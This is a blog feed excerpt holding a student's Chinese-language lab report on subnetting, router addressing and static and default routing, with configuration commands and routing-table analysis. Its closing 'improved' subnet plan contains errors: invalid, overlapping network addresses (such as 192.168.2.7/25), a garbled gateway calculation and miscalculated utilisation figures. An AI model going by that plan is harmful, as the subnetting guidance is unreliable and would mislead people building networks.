,所以需要主机位数为7,因为主机位数7能表达2^7-2个IP(主机位全0和全1扣除)。</p><p>主机数需要7位可以得知IP的网络位是32-7=25位,则子网掩码的前25个位数为1,即子网掩码为255.255.255.128,表格内的子网掩码就填写25,</p><p>网段IP可以填192.168.4.0或者192.168.4.128。两者表达的范围分别是192.168.4.1<del>192.168.4.127和192.168.4.128</del>192.168.4.254。范围都满足分配100个IP。当IP第四段的第一位为1时,IP和子网掩码与运算的结果为192.168.4.128,即进入了192.168.4.128这个网段,所以192.168.4.0的网段最多就能表示128个IP。</p><p>至于为什么第三段是4,只是因为从1递加到4而已。</p><center> <b> <small> 表5.2     IP地址分配表 </small> </b></center><table><thead><tr><th align="center">序号</th><th align="center">节点名称</th><th align="center">IP地址/子网掩码</th><th align="center">网关IP</th></tr></thead><tbody><tr><td align="center">1</td><td align="center">PC1</td><td align="center">192.168.1.1/24</td><td align="center">192.168.1.254</td></tr><tr><td align="center">2</td><td align="center">R1接口F0/0</td><td align="center">192.168.1.254/24</td><td align="center">无</td></tr><tr><td align="center">3</td><td align="center">R1接口F0/1</td><td align="center">192.168.2.253/30</td><td align="center">无</td></tr><tr><td align="center">4</td><td align="center">R2接口F0/0</td><td align="center">192.168.2.254/30</td><td align="center">无</td></tr><tr><td align="center">5</td><td align="center">R2接口F0/1</td><td align="center">192.168.3.253/30</td><td align="center">无</td></tr><tr><td align="center">6</td><td align="center">R3接口F0/0</td><td align="center">192.168.3.254/30</td><td align="center">无</td></tr><tr><td align="center">7</td><td align="center">R3接口F0/1</td><td align="center">192.168.4.129/25</td><td align="center">无</td></tr><tr><td align="center">8</td><td align="center">PC2</td><td align="center">192.168.4.254/25</td><td align="center">192.168.4.129</td></tr><tr><td align="center">9</td><td align="center">R2接口F1/0</td><td align="center">192.168.5.253/30</td><td align="center">无</td></tr><tr><td align="center">10</td><td align="center">R4接口F0/0</td><td align="center">192.168.5.254/30</td><td align="center">无</td></tr><tr><td align="center">11</td><td align="center">R4接口F0/1</td><td align="center">192.168.6.193/26</td><td align="center">无</td></tr><tr><td align="center">12</td><td align="center">PC3</td><td align="center">192.168.6.254/26</td><td align="center">192.168.6.193</td></tr></tbody></table><p>分配结点的IP和子网掩码时,同一网段内的两结点所分配的IP在网段内即可,不分大小先后,别相等就行。</p><p><strong>网关IP选择</strong></p><p>网关IP的填写前首先要明确网关位置处于哪个网段,在下图中可以看到三台PC机的节点(e0)分别和R1接口F0/0,R3接口F0/1、R4接口F0/1处于同一网段,网关IP的选择一定是在同一网段上选择的,所以PC2和PC3的网关IP选择分别是192.168.4.x和192.168.6.x,最后一段数字的选择只要在网段范围内就可以,比如PC2的选择范围就是192.168.4.<code>129</code><del>192.168.4.<code>254</code>,PC3的范围就是192.168.6.<code>193</code></del>192.168.4.<code>254</code>。</p><p>默认网关地址是主机位除最后一位全置1后得到的,根据网络前缀24可知前24位为网络位,后8位为主机位。比如IP地址/子网掩码为192.168.4.129/25的节点的默认网关就是IP地址192.168.4.1<strong>1111110</strong>(加粗的数字部分为主机位),换算成十进制数即192.168.4.254/25</p><blockquote><p>但凡是跟IP地址格式一样的都要加网络前缀,跟子网掩码格式一样的就不用加,假如192.168.4.129/25的网络前缀为27,那么主机位就变成32-27=5位了,即默认网关地址为192.168.4.100<strong>11110</strong> —>193.6.7.158/27 。</p></blockquote><p><img src="https://img-blog.csdnimg.cn/img_convert/eec80f8496e78767205b63633a4805ef.png#pic_center" alt="例"></p><center> <b> <small> 图5.1     实验例图 </small> </b></center><h2 id="网络基本配置"><a href="#网络基本配置" class="headerlink" title="网络基本配置"></a>网络基本配置</h2><ol><li><p>在开始配置节点之前我们可以做一些基础准备,比如路由器的命名。因为此次实验初始化后所有路由器名称都默认为<code>Router</code>,所以为了观察和记录方便我们可以将四个路由器名称设为R1~R4,流程如下:</p><p>① 进入特权模式:<code>enable</code></p><p>② 进入终端配置模式:<code>conf t</code></p><p>③ 更改路由器名称:<code>host R1/R2/R3/R4</code></p></li><li><p>配置节点IP</p><p>先配置三台PC机的IP,命令格式为<code>ip IP地址/子网掩码 网关IP</code></p><p>PC1</p><p><img src="https://gitee.com/wm-mxbg/my-image-hosting-service/raw/master/3-1-1.jpg"></p><center> <b> <small> 图6.1     PC1的IP配置 </small> </b></center><p>PC2</p><p><img src="https://gitee.com/wm-mxbg/my-image-hosting-service/raw/master/3-1-2.jpg"></p> <center> <b> <small> 图6.2     PC2的IP配置 </small> </b> </center><p>PC3</p><p><img src="https://gitee.com/wm-mxbg/my-image-hosting-service/raw/master/3-1-3.jpg"></p> <center> <b> <small> 图6.3     PC3的IP配置 </small> </b> </center><p>再配置R1~R4路由器节点的IP,命令格式为<code>IP 接口IP地址 接口IP的子网掩码</code>;同时查看接口IP配置是否正确,命令格式为<code>do show ip int b</code></p><p>因为初次配置后忘记截图,被初始化后失去了截图的机会,故图片仅展示接口配置,具体的配置接口的命令行用代码展示</p><p>首先进入终端配置模式:<code>conf t</code></p><p><strong>R1</strong></p> <figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> f0/<span class="number">0</span><span class="comment">//进入f0/0接口模式</span></span><br><span class="line">ip add <span class="number">192.168</span><span class="number">.1</span><span class="number">.254</span> <span class="number">255.255</span><span class="number">.255</span><span class="number">.0</span><span class="comment">//设置IP地址和子网掩码</span></span><br><span class="line">no sh<span class="comment">//激活f0/0接口</span></span><br><span class="line"><span class="type">int</span> f0/<span class="number">1</span><span class="comment">//进入f0/1接口模式</span></span><br><span class="line">ip add <span class="number">192.168</span><span class="number">.2</span><span class="number">.253</span> <span class="number">255.255</span><span class="number">.255</span><span class="number">.252</span><span class="comment">//设置IP地址和子网掩码</span></span><br><span class="line">no sh<span class="comment">//激活f0/1接口 </span></span><br></pre></td></tr></table></figure><p>R2~R4的代码展示将只展示 ip add 的命令</p><p><img src="https://img-blog.csdnimg.cn/img_convert/cdc8ac1e681b42b1a3bee192fc398fe0.png#pic_center" alt="3-1-27"></p><center> <b> <small> 图6.4     R1的IP配置 </small> </b></center><p><strong>R2</strong></p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ip add <span class="number">192.168</span><span class="number">.2</span><span class="number">.254</span> <span class="number">255.255</span><span class="number">.255</span><span class="number">.252</span></span><br><span class="line">ip add <span class="number">192.168</span><span class="number">.3</span><span class="number">.253</span> <span class="number">255.255</span><span class="number">.255</span><span class="number">.252</span></span><br><span class="line">ip add <span class="number">192.168</span><span class="number">.5</span><span class="number">.253</span> <span class="number">255.255</span><span class="number">.255</span><span class="number">.252</span></span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/3abf65509469a186d96354bebe800010.png#pic_center" alt="3-1-28"></p><center> <b> <small> 图6.5     R2的IP配置 </small> </b></center><p><strong>R3</strong></p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ip add <span class="number">192.168</span><span class="number">.3</span><span class="number">.254</span> <span class="number">255.255</span><span class="number">.255</span><span class="number">.252</span></span><br><span class="line">ip add <span class="number">192.168</span><span class="number">.4</span><span class="number">.129</span> <span class="number">255.255</span><span class="number">.255</span><span class="number">.128</span></span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/0653e9b73aa78bfe3d82de28c07d7737.png#pic_center" alt="3-1-29"></p><center> <b> <small> 图6.6     R3的IP配置 </small> </b></center>**R4**<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ip add <span class="number">192.168</span><span class="number">.5</span><span class="number">.254</span> <span class="number">255.255</span><span class="number">.255</span><span class="number">.252</span></span><br><span class="line">ip add <span class="number">192.168</span><span class="number">.6</span><span class="number">.193</span> <span class="number">255.255</span><span class="number">.255</span><span class="number">.192</span></span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/6f17ed3ec55531701146e9401637f33b.png#pic_center" alt="3-1-30"></p><center> <b> <small> 图6.7     R4的IP配置 </small> </b></center></li><li><p>配置分析<br>运行命令:<code>show run</code>查看配置信息。</p><p><img src="https://img-blog.csdnimg.cn/img_convert/a36861b46e80c8d6ac959aa1d2dadcbf.png#pic_center" alt="3-1-24"></p><center> <b> <small> 图6.8     R3的配置信息_1 </small> </b></center><p>上图的配置信息中并没有太多的有价值信息,如</p><p>当前配置大小:<code>807Bytes</code></p><p>版本:<code>12.4</code></p><p>路由器名称:<code>R3</code></p><p>等</p><p><img src="https://img-blog.csdnimg.cn/img_convert/5f8471eed2d357120aaab5e09c0973c2.png#pic_center" alt="3-1-25"></p><center> <b> <small> 图6.9     R3的配置信息_2 </small> </b></center><p>这图的信息比较多:但是类型单一,主要描述的是R3各接口的IP配置信息</p><p>R3的f0/0接口:<code>IP地址/子网掩码为:192.168.3.254/30</code></p><p>R3的f0/1接口:<code>IP地址/子网掩码为:192.168.4.129/25</code></p><p>R3的f1/0接口:<code>IP地址未分配</code></p><p>R3的f2/0接口:<code>IP地址未分配</code></p><p>因为这个配置是我配完默认路由之后的配置,所以在途中还有R3所配置的路由:</p><center> <b> <small> 表7.1     R3路由配置 </small> </b></center><table><thead><tr><th align="center">目标网络号</th><th align="center">目标掩码</th><th align="center">下一跳IP</th></tr></thead><tbody><tr><td align="center"><code>0.0.0.0</code></td><td align="center"><code>0.0.0.0</code></td><td align="center"><code>192.168.3.253</code></td></tr></tbody></table></li></ol><h2 id="静态路由、默认路由配置"><a href="#静态路由、默认路由配置" class="headerlink" title="静态路由、默认路由配置"></a>静态路由、默认路由配置</h2><ol><li><p><strong>都配置静态路由</strong></p><p>在配置静态路由的时候一开始我是把所有的路由器都配好了静态路由,而不是只给R2配静态路由,R1、R3、R4配默认路由</p><p>配置静态路由的格式为<code>ip route 目标网络号 目标掩码 下一跳IP</code>,同时查看路由配置是否正确,命令格式为:<code>do show ip route</code></p><p><strong>R1</strong></p><p><img src="https://img-blog.csdnimg.cn/img_convert/80f98b41b7211810cc858561049a5184.png#pic_center" alt="3-1-4"></p><center> <b> <small> 图7.1     R1的静态路由配置 </small> </b></center>**R2**<p><img src="https://img-blog.csdnimg.cn/img_convert/dc65fe8d8a4bddacc0c2cadde2e36943.png#pic_center" alt="3-1-5"></p><center> <b> <small> 图7.2     R2的静态路由配置 </small> </b></center><p><strong>R3</strong></p><p><img src="https://img-blog.csdnimg.cn/img_convert/319e92ef9042a614dbea167957335d87.png#pic_center" alt="3-1-7"></p> <center> <b> <small> 图7.3     R3的静态路由配置 </small> </b> </center><p><strong>R4</strong></p><p><img src="https://gitee.com/wm-mxbg/my-image-hosting-service/raw/master/StaticBlog/1744077eb187c0be2dca91942c99083a.png" alt="3-1-8"></p> <center> <b> <small> 图7.4     R4的静态路由配置 </small> </b> </center></li><li><p><strong>配置静态路由和默认路由</strong></p><p>在经历过全配置静态路由后,按照edu上的要求,为R1、R3、R4三位末梢路由配置默认路由,R2依旧配置静态路由。</p><p>此次试验我配置的默认路由的目标IP和子网掩码都是0:<code>ip route 0.0.0.0 0.0.0.0 下一跳IP</code></p><p><strong>R1</strong></p><p><img src="https://img-blog.csdnimg.cn/img_convert/53d17371bce230db442bb958f6090ea4.png#pic_center" alt="3-1-12"></p><center> <b> <small> 图7.5     R1的默认路由配置 </small> </b></center><p><strong>R2</strong></p><p><img src="https://img-blog.csdnimg.cn/img_convert/b12818507d55868bd29642b1c23357b3.png#pic_center" alt="3-1-13"></p><center> <b> <small> 图7.6     R2的静态路由配置 </small> </b></center><p><strong>R3</strong><img src="https://img-blog.csdnimg.cn/img_convert/c7955ab5bbb58b99d8a520e2f7467815.png#pic_center" alt="3-1-14"></p><center> <b> <small> 图7.7     R3的默认路由配置 </small> </b></center><p><strong>R4</strong><img src="https://img-blog.csdnimg.cn/img_convert/0a6fade2d87ef47911f91c27f189ce37.png#pic_center" alt="3-1-15"></p><center> <b> <small> 图7.8     R3的默认路由配置 </small> </b></center><p>仔细观察会发现除了R2,其余路由器的路由配置里都多了很多行非默认路由的配置,这是因为我在一开始全部路由器配置静态路由后接着就配置了默认路由,导致R1、R2、R3三个末梢路由器的路由配置上有了赘余。所以采用 <code>no ip route 目标网络号 目标掩码 下一跳IP </code>的命令格式去除R1、R2、R3路由器之前配置的静态路由。</p><p><strong>R1</strong><img src="https://img-blog.csdnimg.cn/img_convert/388e7cbb318ce1c0845f9b0b014a9c22.png#pic_center" alt="3-1-16"></p><center> <b> <small> 图7.9     R1正确默认路由配置 </small> </b></center><p><strong>R3</strong></p><p><img src="https://img-blog.csdnimg.cn/img_convert/5f75d0d814d06962989135d087ad36bd.png#pic_center" alt="3-1-18"></p><center> <b> <small> 图7.10     R3正确默认路由配置 </small> </b></center><p><strong>R4</strong></p><p><img src="https://img-blog.csdnimg.cn/img_convert/9de1c1abd60edd379bf3b99216803d46.png#pic_center" alt="3-1-19"></p><center> <b> <small> 图7.11     R4正确默认路由配置 </small> </b></center><p>在这里我发现no ip add后查看的路由参数所显示的子网掩码都是24,这和我当初所设的子网掩码是不一致的。而在我被初始化后的二次配置后,我再进行路由查询,所得的路由参数所显示的子网掩码回归正常,是我当初设的子网掩码。</p><p>我怀疑是no ip add命令导致的处初始化问题。(可能)</p></li><li><p><strong>R3路由表及其分析</strong></p><p>查看R3的路由得</p><p><img src="https://img-blog.csdnimg.cn/img_convert/cb0fd8eb9956a97552e2d3d72638a9f4.png#pic_center" alt="3-1-31"></p><center> <b> <small> 图7.12     R3路由 </small> </b></center><p>编辑成表如下</p> <center> <b> <small> 表7.1     R3路由表 </small> </b> </center><table><thead><tr><th>目标IP/目标掩码</th><th>协议</th><th>优先级</th><th>开销</th><th>下一跳</th><th>本地出口</th></tr></thead><tbody><tr><td>192.168.4.0/25</td><td>Direct</td><td>0</td><td>0</td><td>/</td><td>FastEthernet0/0</td></tr><tr><td>192.168.3.0/30</td><td>Direct</td><td>0</td><td>0</td><td>/</td><td>FastEthernet0/1</td></tr><tr><td>0.0.0.0/0</td><td>Static</td><td>1</td><td>0</td><td>192.168.3.253</td><td>GigabitEthernet0</td></tr></tbody></table><p>首先看<code>协议</code>:</p><p>前两行的协议是Direct,表示当前网段直接连接在本地接口上,当为该接口设置好IP地址后,自动会产生该路由项,当为该接口去掉IP地址后,对应的路由项自动会消失。</p><p>第三行的协议是Static,表示当前路由项是通过命令添加的,可以通过命令删除。</p><p>再看<code>目标IP/目标掩码</code>和<code>本地出口</code>:</p><p>R3路由的f0/0接口的目标IP/掩码为:192.168.4.0/25</p><p>R3路由的f0/1接口的目标IP/掩码为:192.168.3.0/30</p><p>R3路由的静态目标IP/掩码为:0.0.0.0/0;下一跳的静态IP为192.168.3.253</p><p>再看<code>优先级</code>和<code>开销</code>:</p><p>R3路由的f0/0接口和f0/1接口的优先级和开销都为0,匹配选择度高。</p><p>R3的被设路由项额的优先级为1,,开销为0,在优先级上匹配选择度低于R3路由本身接口。</p></li><li><p><strong>R4路由表及其分析</strong></p><p>查看R3的路由得</p><p><img src="https://img-blog.csdnimg.cn/img_convert/a1143479bb130a21e2b95ce6d3037b39.png#pic_center" alt="3-1-32"></p><center> <b> <small> 图7.13     R4路由 </small> </b></center><p>编辑成表如下</p> <center> <b> <small> 表7.2     R4路由表 </small> </b> </center><table><thead><tr><th align="center">目标IP/目标掩码</th><th align="center">协议</th><th align="center">优先级</th><th align="center">开销</th><th align="center">下一跳</th><th align="center">本地出口</th></tr></thead><tbody><tr><td align="center">192.168.5.0/30</td><td align="center">Direct</td><td align="center">0</td><td align="center">0</td><td align="center">/</td><td align="center">FastEthernet0/0</td></tr><tr><td align="center">192.168.6.0/26</td><td align="center">Direct</td><td align="center">0</td><td align="center">0</td><td align="center">/</td><td align="center">FastEthernet0/1</td></tr><tr><td align="center">0.0.0.0/0</td><td align="center">Static</td><td align="center">1</td><td align="center">0</td><td align="center">192.168.5.253</td><td align="center">GigabitEthernet0</td></tr></tbody></table><p>首先看<code>协议</code>:</p><p>前两行的协议是Direct,表示当前网段直接连接在本地接口上,当为该接口设置好IP地址后,自动会产生该路由项,当为该接口去掉IP地址后,对应的路由项自动会消失。</p><p>第三行的协议是Static,表示当前路由项是通过命令添加的,可以通过命令删除。</p><p>再看<code>目标IP/目标掩码</code>和<code>本地出口</code>:</p><p>R4路由的f0/0接口的目标IP/掩码为:192.168.5.0/30</p><p>R4路由的f0/1接口的目标IP/掩码为:192.168.6.0/26</p><p>R4路由的静态目标IP/掩码为:0.0.0.0/0;下一跳的静态IP为192.168.5.253</p><p>再看<code>优先级</code>和<code>开销</code>:</p><p>R4路由的f0/0接口和f0/1接口的优先级和开销都为0,匹配选择度高。</p><p>R4的被设路由项额的优先级为1,,开销为0,在优先级上匹配选择度低于R3路由本身接口。</p></li><li><p><strong>网络连通测试</strong></p><p>在**<code>1. 都配置静态路由</code>**中我为每位路由器配置的都是静态路由,网络连通测试结果如下</p><p><img src="https://img-blog.csdnimg.cn/img_convert/9949ca06781ecde67899cfc8d75a5e00.png#pic_center" alt="3-1-9"></p><center> <b> <small> 图7.14     P1连通P3、P1连通P2测试结果 </small> </b></center><p>并未有特殊情况。</p><p>在**<code>2. 配置静态路由和默认路由</code>**中我为R2路由器配置的是静态路由,R1、R3、R4三台路由器配置的是默认路由,网络连通测试结果如下</p><p><img src="https://img-blog.csdnimg.cn/img_convert/109e7a635ee7fcbeab040c846a03880c.png#pic_center" alt="3-1-33"></p> <center> <b> <small> 图7.15     P1连通P2、P1连通P3测试结果 </small> </b> </center><p>并连通测试P2时超时现象比较严重。</p></li><li><p><strong>路由跟踪测试</strong></p><p>在**<code>1. 都配置静态路由</code>**中我为每位路由器配置的都是静态路由,路由跟踪测试结果如下</p><p><img src="https://img-blog.csdnimg.cn/img_convert/646c95d75da695f3c8e44e05226d75d4.png#pic_center" alt="3-1-11"></p><center> <b> <small> 图7.16     P1跟踪P3测试结果 </small> </b></center><p>.P1跟踪P3,经过IP顺序为 <code>PC1——R1(f0/0)——R2(f0/0)——R4(f0/0)——PC3</code>,图中的四行数据中的ip地址亦是对应顺序的节点IP。</p><p>连通间隔距离一样的三个IP(192.168.1.254、192.168.2.254、192.168.5.254)时,网关地址和一个探针超时间隔,在连通间隔距离更远一级的IP(192.168.6.254)时,网关地址和两个探针超时间隔。</p><blockquote><p><code>* </code>意味着端口不可达或达到最大值(默认为30跳,并且可以使用-m标志进行更改),在每个ttl设置中发送三个探针,并打印一行,显示ttl,网关地址和每个探针的往返时间(所以三个*)。5秒钟内没有响应。超时间隔,将为该探针打印“ *”。</p></blockquote><p>在**<code>2. 配置静态路由和默认路由</code>**中我为R2路由器配置的是静态路由,R1、R3、R4三台路由器配置的是默认路由,网络连通测试结果如下</p><p><img src="https://img-blog.csdnimg.cn/img_convert/78e2aa7924fb58ab7e4cf73b61a9ccf2.png#pic_center" alt="3-1-20"></p> <center> <b> <small> 图7.17     P1跟踪P3测试结果_1 </small> </b> </center><p><img src="https://img-blog.csdnimg.cn/img_convert/ed7f678c0f8e25d6af0446917f19229f.png#pic_center" alt="3-1-21"></p> <center> <b> <small> 图7.18     P1跟踪P3测试结果_2 </small> </b> </center><p><img src="https://img-blog.csdnimg.cn/img_convert/1fd29e1b750861473e5a5cd9f2825b8c.png#pic_center" alt="3-1-22"></p> <center> <b> <small> 图7.19     P1跟踪P3测试结果_3 </small> </b> </center><p>其中<code>测试结果_1</code>是我在第一次配置完后第一次跟踪测试得到的结果,追踪一次后我就没继续尝试,结果第二天被强制初始化了;第二次配置完后无论追踪多少次,都得不到<code>测试结果_1</code>。</p><p>可能是网路原因,网关和探针之间一直超时间隔;</p><p>因为路径上节点数量累加起来没有30,所以原因排除达到最大值;</p><p>也可能是因为不知名的路由设置错误,导致端口不可达。</p><blockquote><p><code>* * *</code>意味着该跃点的路由器不会响应用于跟踪路由的数据包类型,作为追踪者将不了解有关该跃点的任何信息(默认情况下,类Unix上为UDP,而在Windows上为ICMP)。</p></blockquote><p><code>测试结果_2</code>是我在第二次配置完后最少追踪十余次得到的结果。<code>测试结果_3</code>是追踪测试最常见的结果,相比于<code>都配置静态路由</code>时追踪的结果,因为默认直连<code>0.0.0.0</code>,所以少了一个网关和探针的超时间隔,或者说多了一个探针对网关的回应。</p></li></ol><h2 id="实验总结"><a href="#实验总结" class="headerlink" title="实验总结"></a>实验总结</h2><ol><li><p><strong>子网规划</strong></p><p>IP地址的网络规划我还有更多的理解,在实验正文不好阐述,在总结里继续。</p><p>我原本的IP地址网络规划的第三段设置的是1~6递增,这样做的方便之处就是直接在进入主机位所在的第四段之前就已经区分了网段。这种方法是会造成一定的主机位浪费。</p><p>虽然我的网段IP的第四段都是为匹配所需IP数所特意设的起始值,这样相比于起始值都设为0并没有什么进步空间,本质上所占用的位数是一样的,因为网段在第三段开始区分会导致后面的254份可分配IP都被隐形占用了,即使真正使用的IP不够254。</p><p>所以在试验过后我仔细钻研,研究出了一套更加充分利用地址空间的<code>IP子网地址规划</code></p><center> <b> <small> 表8.1     新IP子网地址规划表 </small> </b></center><table><thead><tr><th align="center">网段序号</th><th align="center">IP地址</th><th align="center">子网掩码</th><th align="center">所需IP数</th><th align="center">网段类型</th><th align="center">网关IP</th><th>图中成员节点</th></tr></thead><tbody><tr><td align="center">1</td><td align="center">192.168.1.0</td><td align="center">24</td><td align="center">230</td><td align="center">用户</td><td align="center">192.168.1.254</td><td>PC1、R1接口F0/0</td></tr><tr><td align="center">2</td><td align="center">192.168.2.0</td><td align="center">30</td><td align="center">2</td><td align="center">互连</td><td align="center">无</td><td>R1接口F0/1、R2接口F0/0</td></tr><tr><td align="center">3</td><td align="center">192.168.2.4</td><td align="center">30</td><td align="center">2</td><td align="center">互连</td><td align="center">无</td><td>R2接口F0/1、R3接口F0/0</td></tr><tr><td align="center">4</td><td align="center">192.168.2.7</td><td align="center">25</td><td align="center">100</td><td align="center">用户</td><td align="center">192.168.2.9</td><td>R3接口F0/1、PC2</td></tr><tr><td align="center">5</td><td align="center">192.168.2.128</td><td align="center">30</td><td align="center">2</td><td align="center">互连</td><td align="center">无</td><td>R2接口F1/0、R4接口F0/0</td></tr><tr><td align="center">6</td><td align="center">192.168.2.131</td><td align="center">25</td><td align="center">60</td><td align="center">用户</td><td align="center">192.168.2.133</td><td>R4接口F0/1、PC3</td></tr></tbody></table> <center> <b> <small> 表8.2     新IP地址分配表 </small> </b> </center><table><thead><tr><th align="center">序号</th><th align="center">节点名称</th><th align="center">IP地址/子网掩码</th><th align="center">网关IP</th></tr></thead><tbody><tr><td align="center">1</td><td align="center">PC1</td><td align="center">192.168.1.1/24</td><td align="center">192.168.1.254</td></tr><tr><td align="center">2</td><td align="center">R1接口F0/0</td><td align="center">192.168.1.254/24</td><td align="center">无</td></tr><tr><td align="center">3</td><td align="center">R1接口F0/1</td><td align="center">192.168.2.1/30</td><td align="center">无</td></tr><tr><td align="center">4</td><td align="center">R2接口F0/0</td><td align="center">192.168.2.2/30</td><td align="center">无</td></tr><tr><td align="center">5</td><td align="center">R2接口F0/1</td><td align="center">192.168.2.5/30</td><td align="center">无</td></tr><tr><td align="center">6</td><td align="center">R3接口F0/0</td><td align="center">192.168.2.6/30</td><td align="center">无</td></tr><tr><td align="center">7</td><td align="center">R3接口F0/1</td><td align="center">192.168.2.8/25</td><td align="center">无</td></tr><tr><td align="center">8</td><td align="center">PC2</td><td align="center">192.168.2.126/25</td><td align="center">192.168.2.8</td></tr><tr><td align="center">9</td><td align="center">R2接口F1/0</td><td align="center">192.168.2.129/30</td><td align="center">无</td></tr><tr><td align="center">10</td><td align="center">R4接口F0/0</td><td align="center">192.168.2.130/30</td><td align="center">无</td></tr><tr><td align="center">11</td><td align="center">R4接口F0/1</td><td align="center">192.168.2.132/25</td><td align="center">无</td></tr><tr><td align="center">12</td><td align="center">PC3</td><td align="center">192.168.2.254/25</td><td align="center">192.168.2.132</td></tr></tbody></table><p>相比于实验中所采用的子网地址规划,我的第二个网段到第六个网段的第三段值都设为<code>2</code>,第六个网段的子网掩码设为<code>25</code>充分利用了地址空间。</p><p>旧方案的地址空间利用率为<code>25.984%</code></p><p>(实际分配的IP数(扣除主机位全0全1)/规定划分的IP数:<code>(230+100+60+3*2)/(254*6)</code>)</p><p>而新方案的地址空间利用率为<code>78.884%</code></p><p>(实际分配的IP数(扣除主机位全0全1)/规定划分的IP数:<code>(230+100+60+3*2)/(254+119+123+3*2)</code>)</p><p>新方案相比于旧方案节省了<code>67.060%</code>空间</p><p>((旧方案规定划分的IP数-新方案规定划分的IP数)/旧方案规定划分的IP数)</p><p>下面我将详细解释我这套方案的具体规划:</p><p>在做完实验后我就想第二个网段到第六个网段之间所需IP数加起来不足254,这五个网段IP的第三段都设为2呢,即<code>192.168.2.x</code>这种,经过我长时间的分析这种方法是可行的。</p><p>首先,要明确一点的是,主机位全0和全1是不分配给所需IP的主机的,所以像第二个网段的IP是<code>192.168.2.0</code>,网段内分配的IP只有<code>192.168.2.1</code>和<code>192.168.2.2</code>,<code>192.168.2.0</code>和<code>192.168.2.3</code>的<code>2位主机位</code>分别是全0和全1,所以不能使用。类似的,所有网段都是这样。所以每个网段的表示范围如下(<code>范围的两端IP在分配范围内</code>):</p> <center> <b> <small> 表8.3     IP网段分配IP范围表 </small> </b> </center><table><thead><tr><th align="center">序号</th><th align="center">网段IP地址</th><th align="center">子网掩码</th><th align="center">所需IP数</th><th align="center">分配IP范围</th></tr></thead><tbody><tr><td align="center">1</td><td align="center">192.168.1.0</td><td align="center">24</td><td align="center">230</td><td align="center">192.168.1.1~192.168.1.254</td></tr><tr><td align="center">2</td><td align="center">192.168.2.0</td><td align="center">30</td><td align="center">2</td><td align="center">192.168.2.1~192.168.2.2</td></tr><tr><td align="center">3</td><td align="center">192.168.2.4</td><td align="center">30</td><td align="center">2</td><td align="center">192.168.2.5~192.168.2.6</td></tr><tr><td align="center">4</td><td align="center">192.168.2.7</td><td align="center">25</td><td align="center">100</td><td align="center">192.168.2.8~192.168.2.126</td></tr><tr><td align="center">5</td><td align="center">192.168.2.128</td><td align="center">30</td><td align="center">2</td><td align="center">192.168.2.129~192.168.2.130</td></tr><tr><td align="center">6</td><td align="center">192.168.2.131</td><td align="center">25</td><td align="center">60</td><td align="center">192.168.2.132~192.168.2.254</td></tr></tbody></table><p>可能各位发现子网掩码是30,只需要分配2个IP的网段的表示范围只有<code>2</code>个,那<font color='red'>为什么子网掩码为25,分别需要分配100个IP和60个IP的第四网段及第六网段的表示范围分别有<code>119</code>个和<code>123</code>个呢?</font></p><p>这就是将IP紧密分配在<code>192.168.2.x</code>网段内最容易犯错的点了。</p><p>分配的时候可能会觉得所需多少IP,范围就表达多少就行,就像子网掩码是<code>30</code>的那几个网段就可以了,但是这个范围结果的背后的逻辑不是这么定的。</p><p>我将采取画图的方式来解释这个范围结果的取值逻辑。 <img src="https://img-blog.csdnimg.cn/img_convert/3cf6d3e7610ac7e6ac544a904c18b5a0.png#pic_center" alt="3-1-34"></p> <center> <b> <small> 图8.1     分配IP范围表达 </small> </b> </center><p>起始地址为192.168.2.<code>8</code>,因为192.168.2.<code>7</code>相对于子网掩码<code>30</code>相当于<code>主机位全1</code>,而相对于子网掩码<code>25</code>则只是分配范围内的一个IP(如果分配IP的最小值是192.168.2.0),所以192.168.2.<code>7</code>可以作为第四网段的网段IP,192.168.2.<code>8</code>作为第四网段的起始地址。</p><p>如果按照惯性思维,将192.168.2.<code>107</code>作为分配IP最大值(107-8+1=100),这在表达上是没问题的,但是请注意,子网掩码为<code>25</code>的前提下,主机位分配IP最大值为192.168.2.<code>126</code>(127就是主机位全1了,128进入下一网段)。这就意味着即使人为的讲分配IP最大值设为192.168.2.<code>107</code>,但是192.168.2.<code>108</code>~192.168.2.<code>126</code>依旧是该网段内的待分配IP,所以第四网段规定划分的IP数为126-8+1=<code>129</code>个,而不是认为需要100个就是100个,空间利用率(100/129)就是这么来的。</p><p>那么现在还只剩第六网段待解析,第六网段的起始IP是192.168.2.<code>132</code>,如果子网掩码不改,依旧是<code>26</code>的话,第六网段分配IP最大值将为192.168.2.<code>190</code>,而<code>190-132+1=59<60</code>,就比所需IP数少1个,导致该网段无法满足需求,所以更改子网掩码为<code>25</code>,将使网段内分配IP最大值拔到192.168.2.<code>254</code>,此时分配IP范围满足所需IP数(254-132+1=123)。</p><p>综上,是我对子网划分的进一步思考和探索,如有错误希望各位同志斧正。</p></li><li><p><strong>默认路由</strong></p><p>edu上的知识点指导上给的默认路由例子是ip route <code>0 0 </code>10.10.10.10,但是这么输入会报错,真确命令格式应该是ip route<code>0.0.0.0 0.0.0.0</code>10.10.10.10。</p></li></ol><p>以上就是我对此次实验的总结,很多总结的分析都在实验正文里表述出来,导致正文语句表述不够规范、总结中并无太多方面总结,如有错误,请各位同志斧正。</p>]]></content>
<summary type="html"><p>(这是头歌平台上的一个计网实验,我懒得删改内容了,直接把实验报告上传上来了。大家可以跳到文章内自己想看的位置去看)</p>
<h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>实验目的</h2></summary>
<category term="Computer Network" scheme="http://example.com/categories/Computer-Network/"/>
<category term="experiment" scheme="http://example.com/tags/experiment/"/>
<category term="note" scheme="http://example.com/tags/note/"/>
</entry>
<entry>
<title>XSS & SQL injection</title>
<link href="http://example.com/2020/12/16/XSS%20&%20SQL%20injection/"/>
<id>http://example.com/2020/12/16/XSS%20&%20SQL%20injection/</id>
